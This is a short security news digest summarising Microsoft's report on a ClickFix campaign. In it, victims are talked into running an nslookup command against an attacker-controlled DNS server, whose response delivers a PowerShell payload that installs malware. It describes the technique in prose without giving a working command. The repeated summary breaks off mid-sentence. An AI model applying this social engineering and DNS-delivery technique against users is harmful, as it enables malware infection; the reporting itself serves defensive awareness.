• Threat actors are now abusing DNS queries as part of ClickFix social engineering attacks to deliver malware, making this the first known use of DNS as a channel in these campaigns. • ClickFix attacks typically trick users into manually executing malicious commands under the guise of fixing errors, installing updates, or enabling functionality. • However, this new variant uses a novel technique in which an attacker-controlled DNS server delivers the second-stage payload via DNS lookups. • DNS queries deliver a malicious PowerShell script In a new ClickFix campaign seen by Microsoft, victims are instructed to run the nslookup command that queries an attacker-controlled DNS server instead of the system’s default DNS server. • The command returns a query containing a malicious PowerShell script that is then executed on the device to install malware. • “Microsoft Defender researchers observed attackers using yet another evasion approach to the ClickFix technique: Asking targets to run a command that executes a custom DNS lookup and parses the Name: response to receive the next-stage payload for execution,” reads an X post from Microsoft Threat Intelligence.
Article Summaries:
- Threat actors are now abusing DNS queries as part of ClickFix social engineering attacks to deliver malware, making this the first known use of DNS as a channel in these campaigns. ClickFix attacks typically trick users into manually executing malicious commands under the guise of fixing errors, installing updates, or enabling functionality. However, this new variant uses a novel technique in which an attacker-controlled DNS server delivers the second-stage payload via DNS lookups. DNS queries deliver a malicious PowerShell script In a new ClickFix campaign seen by Microsoft, victims are instr
Sources: